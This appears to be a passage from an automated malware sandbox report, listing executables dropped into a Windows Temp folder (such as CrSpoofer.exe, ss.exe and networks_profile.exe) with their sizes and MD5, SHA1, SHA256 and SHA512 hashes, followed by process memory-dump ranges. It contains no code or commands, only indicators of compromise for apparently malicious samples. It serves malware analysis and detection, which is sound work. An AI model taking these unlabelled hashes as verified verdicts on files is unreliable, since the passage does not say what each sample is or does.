                                  4.3MB

                                  MD5

                                  1d5e4c20a20740f38f061bdf48aaca4f

                                  SHA1

                                  de1b64ab5219aa6fef95cd2b0ccead1c925fd0d0

                                  SHA256

                                  f8172151d11bcf934f2a7518cd0d834e3f079bd980391e9da147ce4cff72c366

                                  SHA512

                                  9df64c97e4e993e815fdaf7e8ecbc3ce32aa8d979f8f4f7a732b2efa636cfeb9a145fe2c2dcdf2e5e9247ee376625e1fdc62f9657e8007bb504336ac8d05a397

                                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\M1OAG0AM2SN7QTI10H1Q.temp

                                  Filesize

                                  7KB

                                  MD5

                                  bfbbc71b44a31616516a0e3eb1756ff9

                                  SHA1

                                  9d62b70a92c58798286fd7da9f2c6d85450b0b28

                                  SHA256

                                  41cf6af62cef65f21a097f30012ee2b42235bd9f6cbbb486fedec7ef674dc1a7

                                  SHA512

                                  b1947baed60a810865607a3163cb03f9584dfff1a961b235b3d9a0d5cd5ea2531808a187d76c2a61a6762671086a39f9f830f03fbb87df4f2a9965bae2bea367

                                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

                                  Filesize

                                  7KB

                                  MD5

                                  0e53e2919c43c10ebbf99ec716c897ca

                                  SHA1

                                  3c65dd2c69334ae3a5b4f987a7cb60adc4d16b15

                                  SHA256

                                  f3ee076a23a5b70e58331a48fc9a2c75513d5058f5975bdb5b9ea6d988ce2080

                                  SHA512

                                  a3f6d9c67b83e11376a248786756f5c15b94b65e42dd5c080c33fba0f3e3f361f2b12300983d66672d65e5fc06884a2375fbe67d2e5cd56f9bbc3db0fb031757

                                • \Users\Admin\AppData\Local\Temp\186279201.exe

                                  Filesize

                                  8KB

                                  MD5

                                  cb8420e681f68db1bad5ed24e7b22114

                                  SHA1

                                  416fc65d538d3622f5ca71c667a11df88a927c31

                                  SHA256

                                  5850892f67f85991b31fc90f62c8b7791afeb3c08ae1877d857aa2b59471a2ea

                                  SHA512

                                  baaabcc4ad5d409267a34ed7b20e4afb4d247974bfc581d39aae945e5bf8a673a1f8eacae2e6783480c8baaeb0a80d028274a202d456f13d0af956afa0110fdf

                                • \Users\Admin\AppData\Local\Temp\240433249.exe

                                  Filesize

                                  15KB

                                  MD5

                                  0c37ee292fec32dba0420e6c94224e28

                                  SHA1

                                  012cbdddaddab319a4b3ae2968b42950e929c46b

                                  SHA256

                                  981d724feebc36777e99513dc061d1f009e589f965c920797285c46d863060d1

                                  SHA512

                                  2b60b571c55d0441ba0cfc695f9db5cd12660ebec7effc7e893c3b7a1c6cb6149df487c31b8d748697e260cbc4af29331592b705ea9638f64a711c7a6164628b

                                • \Users\Admin\AppData\Local\Temp\2408218232.exe

                                  Filesize

                                  5.6MB

                                  MD5

                                  13b26b2c7048a92d6a843c1302618fad

                                  SHA1

                                  89c2dfc01ac12ef2704c7669844ec69f1700c1ca

                                  SHA256

                                  1753ad35ece25ab9a19048c70062e9170f495e313d7355ebbba59c38f5d90256

                                  SHA512

                                  d6aff89b61c9945002a6798617ad304612460a607ef1cfbdcb32f8932ca648bcee1d5f2e0321bb4c58c1f4642b1e0ececc1eb82450fdec7dff69b5389f195455

                                • \Users\Admin\AppData\Local\Temp\2476224829.exe

                                  Filesize

                                  10KB

                                  MD5

                                  96509ab828867d81c1693b614b22f41d

                                  SHA1

                                  c5f82005dbda43cedd86708cc5fc3635a781a67e

                                  SHA256

                                  a9de2927b0ec45cf900508fec18531c04ee9fa8a5dfe2fc82c67d9458cf4b744

                                  SHA512

                                  ff603117a06da8fb2386c1d2049a5896774e41f34d05951ecd4e7b5fc9da51a373e3fcf61af3577ff78490cf898471ce8e71eae848a12812fe98cd7e76e1a9ca

                                • \Users\Admin\AppData\Local\Temp\592416158.exe

                                  Filesize

                                  13KB

                                  MD5

                                  5a0d146f7a911e98da8cc3c6de8acabf

                                  SHA1

                                  4ec56b14a08c897a5e9e85f5545b6c976a0be3c1

                                  SHA256

                                  bf61e77b7c49ce3346a28d8bc084c210618ea6ec5f3cfa9ae8f4aa4d64e145f1

                                  SHA512

                                  6d1526a5f467535d51b7f9b3a7af2d54512526e2523e3048082277b83b6e1a1f0d7e3c617405898f240ae84a16163bc47886d8541a016b31c51dfadf9da713e1

                                • \Users\Admin\AppData\Local\Temp\Files\CrSpoofer.exe

                                  Filesize

                                  312KB

                                  MD5

                                  2e87d4e593da9635c26553f5d5af389a

                                  SHA1

                                  64fad232e197d1bf0091db37e137ef722024b497

                                  SHA256

                                  561c94494c3cd0b918bdf5eb323682fad6596a0a54c4cdd85a99880b4028b3f8

                                  SHA512

                                  0667ddaea41c4c4f21e7bc249384230763c4be7d9c01d6b1cf694da647fbcd66de859afad5f7c88399656da48b349e892f22301380da0bd100199e9c5b23c2e3

                                • \Users\Admin\AppData\Local\Temp\Files\Miles.exe

                                  Filesize

                                  168KB

                                  MD5

                                  1a736481ee80955422945de5dd8589dd

                                  SHA1

                                  dca7760022f8d223e44995f69bd0523a2ca0691e

                                  SHA256

                                  6e60f56a54f6a1c48e727cd8e08c119e37f8b24470a1d27da5b352060006e62b

                                  SHA512

                                  5b92ae8359780eb712a6191ea8c2bd420afc51cac5dcf4128a26e29f42d32c7a70023bafb12d24ae23b20828e60e0924bbdb05555b50e4db313146f9971b1990

                                • \Users\Admin\AppData\Local\Temp\Files\networks_profile.exe

                                  Filesize

                                  6.6MB

                                  MD5

                                  7306abcf62c8ee10a1692a6a85af9297

                                  SHA1

                                  69900ccc2400e685b981b3654af57c062ffb44e2

                                  SHA256

                                  37c9a26faec0bb21171b3968d2e4254f6ae10ff7ae0d0b1493226685bc5d3b4b

                                  SHA512

                                  cd00a60387e06fcc6f14242adb97a54575a49cf1e9b22c74aa5d8bb7617e571fc194049691e4ee0fcff8bdd659b04de62f46d07e2f3330c18ac7035134e183d1

                                • \Users\Admin\AppData\Local\Temp\Files\new1.exe

                                  Filesize

                                  304KB

                                  MD5

                                  b5e07492b13633eacab4b4f57853b439

                                  SHA1

                                  673f25d3b8ca435846dc04eabf6f5b412d9e7ed5

                                  SHA256

                                  d86a4ac9ab81a74a638e659821fd1d76d9b240d2a4e9fd1dc25c387d356d9828

                                  SHA512

                                  cc555116a570db59dfae1beb8587ecda1a25f520bc7aa45423a276a56ab89d21c84cb60df336dc114e388760798399451f1431a9e290b2b4a4d078164bdab999

                                • \Users\Admin\AppData\Local\Temp\Files\newfile.exe

                                  Filesize

                                  392KB

                                  MD5

                                  a896758e32aa41a6b5f04ed92fe87a6c

                                  SHA1

                                  e44b9c7bfd9bab712984c887913a01fbddf86933

                                  SHA256

                                  7664288e924fecf085d750dbd40c405bd0dbc9d1ed662c5ecf79c636976e867c

                                  SHA512

                                  e6ca9818c394fd3cbbb4f21141c40d5cab3c16a82c96435ea1133eabbb44cc954d022dc6cbd13200d08d5ce8d905c3b933b3edf52eeacca858dfd3d6a3866021

                                • \Users\Admin\AppData\Local\Temp\Files\ss.exe

                                  Filesize

                                  72KB

                                  MD5

                                  61584ce40b3b4c6f5b9ac4fb4f8f0ec9

                                  SHA1

                                  e1ae0b513f73c77309a8b29d91c5a3b6f9d5173c

                                  SHA256

                                  ea0a6a37969c93adf76a55f9833d9d1ab2a0017705cc22fd66bd6c6277c84070

                                  SHA512

                                  2c203be3ace0acdccf5c203bb79050388f991b60f6ec4df96fedd3a603eac6ffec26f237c47655a4c90e4b3efa2c4092a747e3890e2ea0df3c28a6e59b779b86

                                • memory/864-143-0x0000000001300000-0x0000000001354000-memory.dmp

                                  Filesize

                                  336KB

                                • memory/1016-553-0x0000000140000000-0x0000000140029000-memory.dmp

                                  Filesize

                                  164KB

                                • memory/1016-551-0x0000000140000000-0x0000000140029000-memory.dmp

                                  Filesize

                                  164KB

                                • memory/1940-543-0x000000001B5B0000-0x000000001B892000-memory.dmp

                                  Filesize

                                  2.9MB

                                • memory/1940-544-0x0000000001D50000-0x0000000001D58000-memory.dmp

                                  Filesize

                                  32KB

                                • memory/2044-554-0x0000000140000000-0x00000001407EF000-memory.dmp

                                  Filesize

                                  7.9MB

                                • memory/2044-552-0x0000000140000000-0x00000001407EF000-memory.dmp

                                  Filesize

                                  7.9MB

                                • memory/2044-549-0x00000000000B0000-0x00000000000D0000-memory.dmp

                                  Filesize

                                  128KB

                                • memory/2320-452-0x000000013F0F0000-0x000000013F0F6000-memory.dmp

                                  Filesize

                                  24KB

                                • memory/2400-480-0x000000013FD00000-0x000000013FD06000-memory.dmp

                                  Filesize

                                  24KB

                                • memory/2408-523-0x0000000001F80000-0x0000000001F88000-memory.dmp

                                  Filesize

                                  32KB

                                • memory/2408-522-0x000000001B5B0000-0x000000001B892000-memory.dmp

                                  Filesize

                                  2.9MB

                                • memory/2420-573-0x0000000000D00000-0x0000000000F12000-memory.dmp

                                  Filesize

                                  2.1MB

                                • memory/2444-526-0x000000013F200000-0x000000013F797000-memory.dmp

                                  Filesize

                                  5.6MB

                                • memory/2540-80-0x0000000000CE0000-0x0000000000D48000-memory.dmp

                                  Filesize

                                  416KB

                                • memory/2652-159-0x0000000000270000-0x00000000002C2000-memory.dmp

                                  Filesize

                                  328KB

                                • memory/2772-548-0x000000013F570000-0x000000013FB07000-memory.dmp

                                  Filesize

                                  5.6MB

                                • memory/2792-355-0x0000000000D80000-0x0000000000DAE000-memory.dmp

                                  Filesize

                                  184KB

                                • memory/3060-147-0x0000000074C00000-0x00000000752EE000-memory.dmp

                                  Filesize

                                  6.9MB

                                • memory/3060-0-0x0000000074C0E000-0x0000000074C0F000-memory.dmp

                                  Filesize

                                  4KB

                                • memory/3060-144-0x0000000074C0E000-0x0000000074C0F000-memory.dmp

                                  Filesize

                                  4KB

                                • memory/3060-2-0x0000000074C00000-0x00000000752EE000-memory.dmp

                                  Filesize

                                  6.9MB

                                • memory/3060-1-0x0000000000D30000-0x0000000000D38000-memory.dmp

                                  Filesize

                                  32KB